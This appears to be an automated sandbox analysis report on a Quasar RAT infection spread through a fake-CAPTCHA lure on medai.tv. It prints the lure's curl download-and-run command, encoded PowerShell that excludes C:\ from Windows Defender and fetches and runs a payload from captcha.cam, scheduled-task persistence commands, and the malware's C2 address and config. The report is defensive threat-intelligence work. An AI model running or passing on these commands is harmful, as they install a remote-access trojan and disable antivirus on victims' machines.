quasar | hxxp://medai[.]tv

Resubmissions

30/12/2024, 03:24

241230-dyd5xswqbv 10

30/12/2024, 03:20

241230-dvvy9swpcy 10

Analysis

max time kernel
44s
max time network
45s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30/12/2024, 03:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://medai.tv

Score

10^/10

quasar 28 execution spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://captcha.cam/file.b64

Extracted

Family

quasar

Version

1.4.1

Botnet

194.26.192.167:2768

Mutex

859d5f90-e2d0-4b2d-ba9f-5371df032ec2

Attributes

encryption_key
BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055
install_name
RuntimeBroker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
RuntimeBroker
subdirectory
RuntimeBroker

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023bae-448.dat	family_quasar
behavioral1/memory/3920-456-0x0000000000AB0000-0x0000000000DD4000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

flow	pid	Process
92	3184	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3596	powershell.exe
4932	powershell.exe
3352	powershell.exe
1500	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
3920	RuntimeBroker.exe
3708	RuntimeBroker.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1444	schtasks.exe
4844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3596	powershell.exe
3596	powershell.exe
3596	powershell.exe
3352	powershell.exe
3352	powershell.exe
3352	powershell.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
3184	powershell.exe
3184	powershell.exe
3184	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	764	firefox.exe
Token: SeDebugPrivilege	764	firefox.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	3920	RuntimeBroker.exe
Token: SeDebugPrivilege	3708	RuntimeBroker.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe
764	firefox.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
764	firefox.exe
3708	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 3260 wrote to memory of 764	3260	firefox.exe	82
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 4996	764	firefox.exe	83
PID 764 wrote to memory of 1712	764	firefox.exe	84
PID 764 wrote to memory of 1712	764	firefox.exe	84
PID 764 wrote to memory of 1712	764	firefox.exe	84
PID 764 wrote to memory of 1712	764	firefox.exe	84
PID 764 wrote to memory of 1712	764	firefox.exe	84
PID 764 wrote to memory of 1712	764	firefox.exe	84
PID 764 wrote to memory of 1712	764	firefox.exe	84
PID 764 wrote to memory of 1712	764	firefox.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://medai.tv"
1⤵
- Suspicious use of WriteProcessMemory
PID:3260
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://medai.tv
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:764
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2008 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6ce8aba-93c6-4537-85cb-908f87db836d} 764 "\\.\pipe\gecko-crash-server-pipe.764" gpu
    3⤵
    PID:4996
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2316 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f7289fc-3140-428d-a6e8-a26042a6cc23} 764 "\\.\pipe\gecko-crash-server-pipe.764" socket
    3⤵
    PID:1712
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -childID 1 -isForBrowser -prefsHandle 3140 -prefMapHandle 2628 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdf57289-1334-4bba-8b17-12169bfb1fac} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    3⤵
    PID:4312
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3668 -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 2616 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b48e739-1c3b-4774-92fd-542f144bba33} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    3⤵
    PID:4036
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4520 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4508 -prefMapHandle 4512 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {953d5e7e-af0b-4a3e-9540-4936c3682eef} 764 "\\.\pipe\gecko-crash-server-pipe.764" utility
    3⤵
    - Checks processor information in registry
    PID:4756
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5416 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77771912-dd94-4862-b468-199954f4ec4a} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    3⤵
    PID:3244
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3088 -childID 4 -isForBrowser -prefsHandle 3156 -prefMapHandle 3172 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de42e1e9-9c6d-4f08-b865-b80cee315325} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    3⤵
    PID:3264
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 5 -isForBrowser -prefsHandle 3048 -prefMapHandle 3184 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4368b503-61a7-476d-b36d-59d1bc781c57} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    3⤵
    PID:3256
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5960 -childID 6 -isForBrowser -prefsHandle 5880 -prefMapHandle 5888 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb28e191-7c5e-4eff-b6b2-cf94ffe7d9f9} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    3⤵
    PID:1460
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 7 -isForBrowser -prefsHandle 5872 -prefMapHandle 6100 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cf56ab8-6b9e-4cbf-8022-acd6309dd742} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    3⤵
    PID:2112

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "curl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd" && "C:\Users\Admin\AppData\Local\Temp\1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.
1⤵
PID:4632
- C:\Windows\system32\curl.exe
  curl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd"
  2⤵
  PID:4932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w h -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\AppData\Local\Temp\1.cmd"' -ArgumentList 'am_admin'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3352
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1.cmd" am_admin
    3⤵
    PID:5032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w h -command ""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5004
    - - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
        5⤵
        
        PID:4632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGMAYQBwAHQAYwBoAGEALgBjAGEAbQAvAGYAaQBsAGUALgBiADYANAAiADsAJABiADYANABGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAGYAaQBsAGUALgBiADYANAAiADsAJABlAHgAZQBGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGIANgA0AEYAaQBsAGUAOwBbAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAZQB4AGUARgBpAGwAZQAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIANgA0AEYAaQBsAGUAIAAtAFIAYQB3ACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQB4AGUARgBpAGwAZQA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3184
    - - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3920
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1444
      - C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3708
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\activity-stream.discovery_stream.json

Filesize
28KB

MD5
6685f0193b32e7070ad78a8bd98c8a8b

SHA1
148f69a0c0150c696f23b7180d43c8b12ab67843

SHA256
12a696848d0c6cc78951b2b813c5382909b0bdc363a52f1d8b470938e070e096

SHA512
d1a55e074a814a5e67c4f9254286a3d33556d285bb2aed026013514c78397b6c77a02af0413f0b9984096c71791fe9ba7f39e19a2637781ef568e8f45380fedd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.cmd

Filesize
1KB

MD5
104cc53cf2a78348c132b27766627399

SHA1
6c1c7eff5c6f5520473f8c861c9408b0cd07d7cf

SHA256
995acc6b43d40f9f8236dfc7b581a8afa2f06c538222d329fef9e6f0b6f4bd18

SHA512
290406d75bdec56531723c245fe55f632415abd4022fb9aebd6a332d0eb33cbd9dec241076534a2265eeacc617afa058cc5c9b170859dc3263042af1e30d1e0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe

Filesize
3.1MB

MD5
b94af11cca65c557d23559e978a49d18

SHA1
0c3436d0c5df8e2e39bf4869bbe4413ca8d594b7

SHA256
f6a0a782d574de811fe66ecf6416c69b486f9ca20faf96cfc863a00063306338

SHA512
c1254360b2382957f043b8edcf36b28f13a93d0860dc9609d9b46eded81bc004e4149113e9eaad8b4d2cc18164942588bd4e97ecd8fce4f9afd8e537bc668b16

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqbzuwit.vgo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\AlternateServices.bin

Filesize
6KB

MD5
042618aac354ed6ecd6ead6fbd860e7d

SHA1
9edf43c8756fd8b2b6413a872c5383a0a23cb776

SHA256
db7253a942ccb701cec65268037509f8a8e68cb5e71640bf2fd7586ffa8e520f

SHA512
b9d4a843cb8b3b320e25cc6df25d4d266432914bf60209a5b0f3468f757a42748fb37ba9a1211435a6f6cb8fac1e4a2368101e03ece359829df90cd57426840c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\AlternateServices.bin

Filesize
10KB

MD5
30d20c1d453d8bd1cbf70f02338def30

SHA1
408bfa8f0e8e4f2f1b9d9f34d6e7def1fa490969

SHA256
e33285efc3260432b1b676e151d165f0efe5ba19690cfe9c28c3889f3cb8821b

SHA512
b44cf52f2e84f88bfc251703eeef09390a1d3f8f6146b3a62a9987eb959a79e30748e2d3b5ff8b59852bd1b3bbd700e0cb7080cfd6cb6aa89a67bd1605370bc6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
654a8276583c6ceadd297dcb57c6c780

SHA1
c7cc07d790fa52847af06794affeef4f8f5c64eb

SHA256
ba64d888529475d8529eff5490ae4226bee7ca15b0f86a0d4f2e85ace72dcd14

SHA512
76ee4eb922d2977283a8e835f12e59f6e035ae0a38d9995a119f14a1f00cf8efb6e370eba5ecb8a80ea301f94e07b3c33b833032d1db1a4667aaa91b2c9ab64c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp

Filesize
23KB

MD5
7c620f2920487e278cbe9224e9d196a4

SHA1
9138eae3ba38ad2c1b4bd8c0c21d394608d3b200

SHA256
97dee508bdddcbdd4d29d0d10bdbea574b729dfc91c127271d7829ac8b51c6b0

SHA512
1ead843c7310e717cbbcfb663f1afea889b128670a5cc0bf70308fa26eb291e3d732230fee5ccd8c20301304329d9fa8a516ed009ec09e35707b3a532d22afce

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
2c88cee63a87d9b787b3d79fe4241c7c

SHA1
cbf3c111fab385dfc9be6c4d3ff09772c92b8959

SHA256
1c1c026c8b4203a0c4721580052a5d8dac564e2150666213a1cc4aff2dc54438

SHA512
88954be7d00d2b1415d23ad727c66db66b10231e28cbdf74896cd5c69b08998af64476cc23a119d62dc563cb5b4af126e0dd83b77d8caf9fb76c2241883ddb11

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\40c2033f-65d9-4180-8b36-898c9194b65f

Filesize
659B

MD5
ac5f67f3bf81da1c251cd21c940cc06c

SHA1
71e732b72420b0f20b9f698a826ad283d217d6b5

SHA256
6611054e25f75d74a08f84a16a46b6afec95f9f8001f416ee8bf6a29a5217c53

SHA512
